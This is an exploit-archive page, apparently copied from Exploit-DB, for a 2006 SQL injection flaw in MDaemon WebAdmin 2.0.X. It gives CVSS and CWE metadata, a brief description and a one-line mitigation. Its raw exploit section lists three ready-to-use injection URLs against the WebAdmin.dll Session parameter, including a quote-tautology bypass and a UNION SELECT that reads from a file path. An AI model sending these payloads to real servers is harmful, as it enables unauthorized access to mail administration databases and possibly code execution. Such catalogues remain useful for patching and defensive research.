header-logo
Suggest Exploit
vendor:
MDaemon WebAdmin
by:
KOUSULIN
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: MDaemon WebAdmin
Affected Version From: 2.0.X
Affected Version To: 2.0.X
Patch Exists: NO
Related CWE: N/A
CPE: 2.0.X
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 2003
2006

MDaemon WebAdmin 2.0.X SQL injection

An attacker can exploit a SQL injection vulnerability in MDaemon WebAdmin 2.0.X by sending a crafted request to the /WebAdmin.dll?Session parameter. This can allow the attacker to access the underlying database and potentially execute arbitrary code.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

# Exploit Title: MDaemon WebAdmin 2.0.X SQL injection
# Date: 2006/5/26
# Author: KOUSULIN
# Software Link: http://archive.altn.com/WebAdmin/Archive/2.0.8/wa208_en.exe
# Version: WebAdmin 2.0.X
# Tested on: Windows 2003
# CVE : N/A
# Code :

/WebAdmin.dll?Session='[ACCESS SQL INJ]&View=User

/WebAdmin.dll?Session='or''='&View=User  # need a active session

/WebAdmin.dll?Session='UNION SELECT * FROM A IN 'C:\ZZZ' WHERE ''='&View=User

Navigation

Suggest Exploit

Services By CQR